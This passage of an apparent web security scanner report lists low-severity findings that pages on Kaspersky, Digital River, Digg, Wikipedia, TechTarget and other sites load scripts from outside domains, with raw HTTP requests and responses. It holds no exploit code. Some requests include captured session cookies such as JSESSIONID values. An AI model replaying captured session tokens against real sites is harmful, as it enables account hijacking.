<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE&num=5&layt=1&fmt=simp"></script>
...[SNIP]...


<script src="https://apis.google.com/js/plusone.js" type="text/javascript"></script>
...[SNIP]...

16.3. http://brazil.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://brazil.kaspersky.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://brazil.kaspersky.ugc.bazaarvoice.com/static/8819-pt_br/bvapi.js

Request

GET / HTTP/1.1
Host: brazil.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Sun, 04 Sep 2011 13:58:37 +0000
Cache-Control: public, max-age=0
ETag: "1315144717-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Content-Type: text/html; charset=utf-8
Content-Length: 45095
Date: Sun, 04 Sep 2011 13:59:59 GMT
X-Varnish: 1163230756 1163227882
Age: 80
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
</script>
<script type="text/javascript" src="//brazil.kaspersky.ugc.bazaarvoice.com/static/8819-pt_br/bvapi.js"> </script>
...[SNIP]...

16.4. http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.ttgtmedia.com
Path:	/rms/ux/javascript/tt_scripts.js

Issue detail

The response dynamically includes the following script from another domain:

http://admin.brightcove.com/js/experience_util.js

Request

GET /rms/ux/javascript/tt_scripts.js HTTP/1.1
Host: cdn.ttgtmedia.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:26 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n53.panthercdn.com
Cache-Control: max-age=604800
Expires: Mon, 05 Sep 2011 19:43:20 GMT
Age: 491406
Content-Length: 35307
Content-Type: application/x-javascript
Vary: Accept-Encoding
Last-Modified: Mon, 22 Aug 2011 14:58:29 GMT
Connection: keep-alive

var isHome=isHome||false;var is404=is404||false;var allcookies=document.cookie;var indexLogin=allcookies.indexOf("Datav2");var indexProps=indexLogin;var indexProps2=allcookies.indexOf("uidLoggedIn");v
...[SNIP]...
<link rel="stylesheet" href="'+ENV_mediaHost+'/css/tt_thickbox_reg.css" type="text/css" media="screen" />');document.write('<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></scr'+'ipt>
...[SNIP]...

16.5. http://corporate.digitalriver.com/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store

Issue detail

The response dynamically includes the following script from another domain:

http://t2.trackalyzer.com/trackalyze.js

Request

Response

16.6. http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs

Issue detail

The response dynamically includes the following script from another domain:

http://t2.trackalyzer.com/trackalyze.js

Request

GET /store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.1.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.2.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145848307; fcPT=http%3A//corporate.digitalriver.com/store/digriv/html/pbPage.Homepage%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1315145806740; fcC=X=C708273219&Y=1315145848489&FV=10&H=1315145848307&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=1&E=4615679&F=0&I=1315145925158

Response

16.7. http://corporate.digitalriver.com/store/digriv/Corp/sectionName.payment/subSectionName.paymentOverview/page.paymentOverview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/Corp/sectionName.payment/subSectionName.paymentOverview/page.paymentOverview

Issue detail

The response dynamically includes the following script from another domain:

http://t2.trackalyzer.com/trackalyze.js

Request

GET /store/digriv/Corp/sectionName.payment/subSectionName.paymentOverview/page.paymentOverview HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=pci&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; RefURL=http%3A%2F%2Fcorporate.digitalriver.com%2Fstore%2Fdigriv%2FCorp%2FsectionName.company%2FsubSectionName.aboutUs%2Fpage.aboutUs; op_browser=safari_535.1; op_browserHigh=safari; op_os=windows; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.5.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.5.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145973870; fcPT=http%3A//corporate.digitalriver.com/store%3FAction%3DDisplayProductSearchResultsPage%26SiteID%3Ddigriv%26Locale%3Den_US%26ThemeID%3D16015700%26CallingPageID%3DCorpPage%26keywords%3Dpci%26x%3D0%26y%3D0; fcC=X=C708273219&Y=1315145973986&FV=10&H=1315145973870&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=4&E=3737408&F=0&I=1315145978185&vis=e500888zxss#e500888zpci

Response

16.8. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/html/pbPage.Homepage

Issue detail

The response dynamically includes the following script from another domain:

http://t2.trackalyzer.com/trackalyze.js

Request

Response

16.9. http://corsec.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corsec.com
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://stats.sa-as.com/sniff.js
http://www.bridgemailsystem.com/pms/js/bridgestatz.js

Request

GET /index.php HTTP/1.1
Host: corsec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.10. http://devirusare.com/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://devirusare.com
Path:	/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

http://quickscan.bitdefender.com/media/scripts/getWidget.js
http://s7.addthis.com/js/250/addthis_widget.js
http://safelinks-api.f-secure.com/js/c2f75bb7ca9bd5b6c6888b21313352c36798
http://storage.trafic.ro/js/trafic.js
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
http://www.google.com/jsapi
http://www.t5.ro/static/t5-stats.js
http://xslt.alexa.com/site_stats/js/s/a?url=www.devirusare.com

Request

GET /x26amp HTTP/1.1
Host: devirusare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:00:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Vary: Cookie
X-Pingback: http://devirusare.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1315144803+50.23.123.106; path=/
Set-Cookie: WPS_return_count=2; expires=Mon, 03-Sep-2012 14:00:03 GMT; path=/
Set-Cookie: wpgb_visit_last_php-default=1315144803; expires=Mon, 03-Sep-2012 14:00:03 GMT; path=/
Set-Cookie: 546900147=282444786
Last-Modified: Sun, 04 Sep 2011 14:00:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="ht
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</p>
<script type="text/javascript" language="javascript" src="http://quickscan.bitdefender.com/media/scripts/getWidget.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://safelinks-api.f-secure.com/js/c2f75bb7ca9bd5b6c6888b21313352c36798"></script>
...[SNIP]...
<div class="textwidget"><SCRIPT type='text/javascript' language='JavaScript' src='http://xslt.alexa.com/site_stats/js/s/a?url=www.devirusare.com'></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://storage.trafic.ro/js/trafic.js"
></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.t5.ro/static/t5-stats.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#pubid=wp-4e638463225f06a5"></script>
...[SNIP]...

16.11. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/lib.655e7d5e.js
http://cdn4.diggstatic.com/js/two_column/common/fb_loader.7fbbdd84.js

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31652 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</div>

<script src="http://cdn4.diggstatic.com/js/two_column/common/fb_loader.7fbbdd84.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.655e7d5e.js" type="text/javascript"></script>
...[SNIP]...

16.12. http://en.wikipedia.org/wiki/Website#Product-_or_service-based_sites/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Website#Product-_or_service-based_sites/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&lang=en&modules=site&only=scripts&skin=vector
http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&lang=en&modules=startup&only=scripts&skin=vector
http://geoiplookup.wikimedia.org/

Request

GET /wiki/Website#Product-_or_service-based_sites/x26amp HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 13:57:02 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Fri, 02 Sep 2011 14:19:24 GMT
Content-Length: 95961
Content-Type: text/html; charset=UTF-8
Age: 194
X-Cache: HIT from sq60.wikimedia.org
X-Cache-Lookup: HIT from sq60.wikimedia.org:3128
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
...[SNIP]...
</style>
<script src="http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&lang=en&modules=startup&only=scripts&skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&lang=en&modules=site&only=scripts&skin=vector" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

16.13. http://forum.kaspersky.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.kaspersky.com
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://mc.yandex.ru/metrika/watch.js

Request

GET /index.php HTTP/1.1
Host: forum.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.14. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/expansion_embed.js
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js

Request

Response

16.15. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

16.16. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.16/jquery-ui.min.js

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 14:01:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 117175

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.16/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

16.17. http://latam.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://latam.kaspersky.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://latam.kaspersky.ugc.bazaarvoice.com/static/8820-es/bvapi.js

Request

GET / HTTP/1.1
Host: latam.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
Etag: "1315141507-0"
Cache-Control: public, max-age=0
Last-Modified: Sun, 04 Sep 2011 13:05:07 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Content-Type: text/html; charset=utf-8
Content-Length: 41617
Date: Sun, 04 Sep 2011 14:01:56 GMT
X-Varnish: 1163235755 1163223310
Age: 332
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" src="//latam.kaspersky.ugc.bazaarvoice.com/static/8820-es/bvapi.js"> </script>
...[SNIP]...

16.18. http://lwn.net/Articles/456878/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lwn.net
Path:	/Articles/456878/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /Articles/456878/ HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

16.19. http://mi.adinterax.com/customer/computerworld/NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus.ns.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mi.adinterax.com
Path:	/customer/computerworld/NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus.ns.js

Issue detail

The response dynamically includes the following script from another domain:

http://altfarm.mediaplex.com/ad/js/15949-135754-6950-5?mpt='+adx_id_172003+'&mpvc='+adx_P_172003+adx_tp_172003+'/re/'+adx_data_172003+'/'+adx_id_172003+'/0/tc%2cac%2cl2c%2cc:/'+'

Request

Response

16.20. http://office.microsoft.com/client/searchresults14.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://office.microsoft.com
Path:	/client/searchresults14.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://officeimg.vo.msecnd.net/_layouts/MicrosoftAjax.js?b=5574%2E4000
http://officeimg.vo.msecnd.net/_layouts/jquery.js?b=5574%2E4000
http://officeimg.vo.msecnd.net/_layouts/oo.js?b=5574%2E4000
http://officeimg.vo.msecnd.net/_layouts/oosearch.js?b=5574%2E4000

Request

Response

16.21. http://searchsecurity.techtarget.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js
http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110830
http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js
http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js
http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js
http://content.dl-rms.com/rms/mother/5541/nodetag.js

Request

GET / HTTP/1.1
Host: searchsecurity.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 14:12:11 GMT
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Connection: close
Content-Length: 82990

<!DOCTYPE html>
<html>
   <head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getTime()])</script>
       <meta name="pageStart" content="1315144931173" />

...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js"></script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cdn.ttgtmedia.com/rms/ux/css/searchsecurity_new.css" id="stylesheetSiteSpecific" media="screen" />

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110830"></script>
...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/5541/nodetag.js"></script>
...[SNIP]...

16.22. http://searchsecurity.techtarget.com/magazine-sections/2011 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/magazine-sections/2011

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js
http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110830
http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js
http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js
http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js
http://content.dl-rms.com/rms/mother/5541/nodetag.js

Request

GET /magazine-sections/2011 HTTP/1.1
Host: searchsecurity.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 14:12:12 GMT
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Connection: close
Content-Length: 59713

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getTime()]
...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js"></script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js"></script>
<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cdn.ttgtmedia.com/rms/ux/css/redesign_corrections.css" id="stylesheetCorrections" media="screen" />

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110830"></script>
...[SNIP]...


<script type="text/javascript" src="http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/5541/nodetag.js"></script>
...[SNIP]...

16.23. http://searchsecurity.techtarget.com/magazine-sections/2011/09 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/magazine-sections/2011/09

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.ttgtmedia.com/rms/ux/javascript/baynote-lib.js
http://cdn.ttgtmedia.com/rms/ux/javascript/googleAnalytics.min.js?date=20110901
http://cdn.ttgtmedia.com/rms/ux/javascript/ieFixScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery-1.4.2.min.js
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js
http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_thickbox-compressed.js
http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js
http://content.dl-rms.com/rms/mother/5541/nodetag.js

Request

GET /magazine-sections/2011/09 HTTP/1.1
Host: searchsecurity.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 14:12:11 GMT
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
